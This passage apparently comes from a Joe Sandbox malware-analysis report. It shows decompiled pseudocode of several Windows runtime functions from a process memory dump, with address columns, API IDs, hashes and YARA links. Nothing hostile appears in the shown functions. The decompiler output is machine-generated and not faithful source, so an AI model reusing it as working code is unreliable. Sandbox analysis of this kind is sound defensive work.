				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E02F153CA(0);
						return E02EED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E02EDF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E02EB3690(1, _t117, 0x2e71810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E02EDAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L02EB4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E02EDAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E02F1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E02ED9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















              0x02f151be
              0x02f151c3
              0x02f151c8
              0x02f151cd
              0x02f151d0
              0x02f151d3
              0x02f151d8
              0x02f151db
              0x02f151de
              0x02f151e0
              0x02f151e3
              0x02f151e6
              0x02f151e8
              0x02f15342
              0x02f15351
              0x02f15356
              0x02f1535a
              0x02f15360
              0x02f15363
              0x02f15366
              0x02f15369
              0x02f15369
              0x02f1536b
              0x02f1536b
              0x02f15370
              0x02f153a3
              0x02f153a4
              0x02f153a6
              0x02f153ab
              0x02f153ab
              0x02f153ae
              0x02f153ae
              0x02f153b5
              0x02f153bf
              0x02f153bf
              0x02f15375
              0x02f15396
              0x02f153a0
              0x02f153a0
              0x00000000
              0x02f15396
              0x02f15377
              0x02f15379
              0x02f1537f
              0x02f1538c
              0x02f15390
              0x00000000
              0x02f15390
              0x02f151ee
              0x02f151f1
              0x02f15301
              0x02f15310
              0x02f15315
              0x02f15318
              0x02f1531b
              0x02f15320
              0x02f1532e
              0x02f15331
              0x00000000
              0x02f15331
              0x02f15328
              0x02f15329
              0x00000000
              0x02f15329
              0x02f151fa
              0x02f15235
              0x02f15236
              0x02f15239
              0x02f1523f
              0x02f15240
              0x02f15241
              0x02f15242
              0x02f15246
              0x02f15247
              0x02f1524e
              0x02f15251
              0x02f15267
              0x02f15269
              0x02f1526e
              0x02f1527d
              0x02f1527e
              0x02f15281
              0x02f15282
              0x02f15287
              0x02f15288
              0x02f1528a
              0x02f1528f
              0x02f15294
              0x00000000
              0x00000000
              0x02f1529a
              0x02f1529c
              0x02f1529e
              0x02f1529e
              0x02f152a4
              0x02f152b0
              0x00000000
              0x00000000
              0x02f152ba
              0x02f152bc
              0x02f152bc
              0x02f152d4
              0x02f152d9
              0x02f152dc
              0x02f152e1
              0x00000000
              0x00000000
              0x02f152e7
              0x02f152f4
              0x00000000
              0x02f152f4
              0x02f15270
              0x00000000
              0x02f15270
              0x02f151fc
              0x02f151fd
              0x02f15202
              0x02f15203
              0x02f15205
              0x02f1520a
              0x02f1520f
              0x00000000
              0x00000000
              0x02f1521b
              0x02f15226
              0x02f1522b
              0x02f1521d
              0x02f1521d
              0x02f15222
              0x02f15222
              0x02f1522d
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: Legacy$UEFI
              • API String ID: 2994545307-634100481
              • Opcode ID: cb96a61fa16b6967ea184b7c44cd7c6c987d41662c1a8f54bd1f6b5599db2d5c
              • Instruction ID: 6b142d05a748d33bd0c7ccc2181f9303e60364611fad3214fad88200222d22df
              • Opcode Fuzzy Hash: cb96a61fa16b6967ea184b7c44cd7c6c987d41662c1a8f54bd1f6b5599db2d5c
              • Instruction Fuzzy Hash: 5B517D72E406089FDB24DFA8C850BAEB7FAFF88744F94806DE609EB251D7719901CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 78%
              			E02E9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x2f6f7a8);
				E02EED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E02EED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E02EDD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E02EDF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L02EEDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E02EDB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E02EDB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E02EDE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E02EDA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















              0x02e9b171
              0x02e9b171
              0x02e9b171
              0x02e9b171
              0x02e9b171
              0x02e9b176
              0x02e9b17b
              0x02e9b180
              0x02e9b186
              0x02e9b18f
              0x02e9b198
              0x02e9b1a4
              0x02e9b1aa
              0x02ef4802
              0x02ef4802
              0x02ef4805
              0x02ef480c
              0x02ef480e
              0x02e9b1d1
              0x02e9b1d3
              0x02e9b1de
              0x02e9b1de
              0x02ef4817
              0x02ef481e
              0x02ef4820
              0x02ef4822
              0x02ef4822
              0x02ef4824
              0x02ef4824
              0x02ef482a
              0x00000000
              0x00000000
              0x02ef4835
              0x02ef483a
              0x02ef483d
              0x02ef483f
              0x02ef4842
              0x02ef4842
              0x02ef4842
              0x02ef4846
              0x02ef484c
              0x02ef484e
              0x02ef4851
              0x02ef4851
              0x02ef4853
              0x02ef4854
              0x02ef4854
              0x02ef4858
              0x02ef485a
              0x02ef485a
              0x02ef485d
              0x02ef485f
              0x02ef4861
              0x02ef4861
              0x02ef4866
              0x02ef486b
              0x02ef486e
              0x02ef4871
              0x02ef4876
              0x02ef4876
              0x02ef4878
              0x02ef487b
              0x02ef4884
              0x02ef4884
              0x00000000
              0x02ef487d
              0x02ef487d
              0x02ef4882
              0x02ef4889
              0x02ef4889
              0x02ef488f
              0x02ef4891
              0x02ef48e0
              0x02ef48e2
              0x02ef48e4
              0x02ef48e4
              0x02ef48e7
              0x02ef48e7
              0x02ef48ed
              0x02ef48f4
              0x02ef48f6
              0x02ef4951
              0x02ef4951
              0x02ef4953
              0x02ef4953
              0x02ef4956
              0x02ef4956
              0x02ef4958
              0x02ef4959
              0x02ef4959
              0x02ef495d
              0x02ef495d
              0x02ef495f
              0x02ef495f
              0x02ef4965
              0x02ef4969
              0x02ef49ba
              0x02ef49ba
              0x02ef49c1
              0x02ef49c5
              0x02ef49cc
              0x02ef49d4
              0x02ef49d7
              0x02ef49da
              0x02ef49e4
              0x02ef49e5
              0x02ef49f3
              0x02ef4a02
              0x00000000
              0x02ef4a02
              0x02ef4972
              0x02ef4974
              0x00000000
              0x00000000
              0x02ef4976
              0x02ef4979
              0x02ef4982
              0x02ef4983
              0x02ef4984
              0x02ef498b
              0x02ef498d
              0x02ef4991
              0x02ef4993
              0x02ef4999
              0x02ef499d
              0x02ef49a2
              0x02ef49a2
              0x02ef49a2
              0x02ef4999
              0x02ef49ac
              0x00000000
              0x02ef49b3
              0x02ef48f8
              0x02ef48fe
              0x00000000
              0x00000000
              0x00000000
              0x02ef48fe
              0x02ef4895
              0x02ef489c
              0x02ef48ad
              0x02ef48b2
              0x02ef48b5
              0x02ef48b7
              0x02ef48ba
              0x02ef48bc
              0x02ef48c6
              0x02ef48c6
              0x02ef48cb
              0x02ef48d1
              0x02ef48d4
              0x02ef48d8
              0x02ef48d8
              0x00000000
              0x02ef48d8
              0x02ef48be
              0x02ef48c0
              0x00000000
              0x00000000
              0x02ef48c2
              0x00000000
              0x00000000
              0x00000000
              0x02ef48c4
              0x00000000
              0x02ef4882
              0x02ef487b
              0x02ef4904
              0x02ef4906
              0x00000000
              0x00000000
              0x02ef4908
              0x02ef490e
              0x00000000
              0x00000000
              0x02ef4910
              0x02ef4917
              0x02ef4917
              0x00000000
              0x02ef4917
              0x02e9b1ba
              0x02ef47f9
              0x02ef47fc
              0x00000000
              0x00000000
              0x00000000
              0x02ef47fc
              0x02e9b1c0
              0x02e9b1c0
              0x02e9b1c3
              0x02e9b1cb
              0x00000000
              0x00000000
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: _vswprintf_s
              • String ID:
              • API String ID: 677850445-0
              • Opcode ID: 70a7e0afb9c2a7f5b7e1b660d1e60552b0a916a65262eb00f75f705ad1b94fac
              • Instruction ID: f0f0687693681020277e18184106e139e56b65968f8debdd55217d6c55d81219
              • Opcode Fuzzy Hash: 70a7e0afb9c2a7f5b7e1b660d1e60552b0a916a65262eb00f75f705ad1b94fac
              • Instruction Fuzzy Hash: 7751D071E4029A8ADF75CF64C844BAEBBB1BF00718F1091ADEA59AB281D7704941CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EBB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E02EBB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x2f8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E02EB7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E02F68CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E02ED9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E02EDB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E02EDCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E02EB7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E02F68F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E02EDAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x2f88628; // 0x0
								_v68 = _t77;
								_t78 =  *0x2f8862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x2f88628; // 0x0
							_t116 =  *0x2f8862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































              0x02ebb94c
              0x02ebb956
              0x02ebb95c
              0x02ebb95e
              0x02ebb964
              0x02ebb969
              0x02ebb96d
              0x02ebb96d
              0x02ebb970
              0x02ebb974
              0x02ebb97a
              0x02ebbadf
              0x02ebbadf
              0x02ebbae2
              0x02ebbae4
              0x02ebbae6
              0x02ebbaf0
              0x02f02cb8
              0x02ebbaf6
              0x02ebbaf6
              0x02ebbaf6
              0x02ebbafd
              0x02ebbb1f
              0x02ebbb1f
              0x02ebbaff
              0x02ebbb00
              0x02ebbb00
              0x02ebbb03
              0x02ebbb03
              0x02ebbacb
              0x02ebbacf
              0x02ebbad0
              0x02ebbad1
              0x02ebbadc
              0x02ebbadc
              0x02ebb980
              0x02ebb980
              0x02ebb988
              0x02ebb98b
              0x02ebb98d
              0x02ebb990
              0x02ebb993
              0x02ebb999
              0x02ebb99b
              0x02ebb9a1
              0x02ebb9a5
              0x02ebb9aa
              0x02ebb9b0
              0x02ebb9bb
              0x02ebb9c0
              0x02ebb9c3
              0x02ebb9ca
              0x02ebb9cc
              0x02ebb9cf
              0x02ebb9d3
              0x02ebb9d7
              0x02ebba94
              0x02ebba94
              0x02ebba98
              0x02ebbaa3
              0x02f02ccb
              0x02ebbaa9
              0x02ebbaa9
              0x02ebbaa9
              0x02ebbab1
              0x02f02cd5
              0x02f02cdd
              0x02f02cdd
              0x02ebbabb
              0x02ebbabc
              0x02ebbac2
              0x02ebbac3
              0x02ebbac3
              0x02ebbac6
              0x00000000
              0x02ebb9dd
              0x02ebb9dd
              0x02ebb9e7
              0x02ebb9e7
              0x02ebb9ec
              0x02ebb9ec
              0x02ebb9f1
              0x02ebb9f5
              0x02ebb9fa
              0x02ebba00
              0x02ebba0c
              0x02ebba10
              0x02ebba10
              0x02ebba12
              0x02ebba18
              0x00000000
              0x00000000
              0x02ebbb26
              0x02ebbb26
              0x02ebba1e
              0x02ebba1e
              0x02ebba23
              0x02ebba25
              0x02ebba2c
              0x02ebba30
              0x02ebba35
              0x02ebba35
              0x02ebba41
              0x02ebba46
              0x02ebba4c
              0x02ebba50
              0x02ebba54
              0x02ebba6a
              0x02ebba6e
              0x02ebba70
              0x02ebba74
              0x02ebba78
              0x02ebba7a
              0x02ebba7c
              0x02ebba8e
              0x02ebba90
              0x02ebba92
              0x02ebbb14
              0x02ebbb14
              0x02ebbb16
              0x02ebbb16
              0x00000000
              0x02ebba7c
              0x02ebbb0a
              0x02ebbb0d
              0x00000000
              0x00000000
              0x00000000
              0x02ebbb0f

              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EBB9A5
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID:
              • API String ID: 885266447-0
              • Opcode ID: 0c3c34aaf3b9b2673bc1ada77b23fa9edf080f42b9d313d43512756c133099da
              • Instruction ID: e9558440b197ad9337158bfc77ffabc6100289f8c06d8ce74716604bd87e0d11
              • Opcode Fuzzy Hash: 0c3c34aaf3b9b2673bc1ada77b23fa9edf080f42b9d313d43512756c133099da
              • Instruction Fuzzy Hash: DC515371A48300CFCB21CF28C480A6BFBE5BF89658F54996EE99587344D730E844CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 81%
              			E02EC2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				intOrPtr _t274;
				signed int _t276;
				signed int _t278;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				void* _t335;
				void* _t337;
				void* _t338;

				_t332 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x2f8d360 ^ _t332;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x2f8b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t338 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t274 = 0x48;
				_t309 = 0 | _t338 == 0x00000000;
				_t320 = 0;
				_v37 = _t338 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L02EB4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
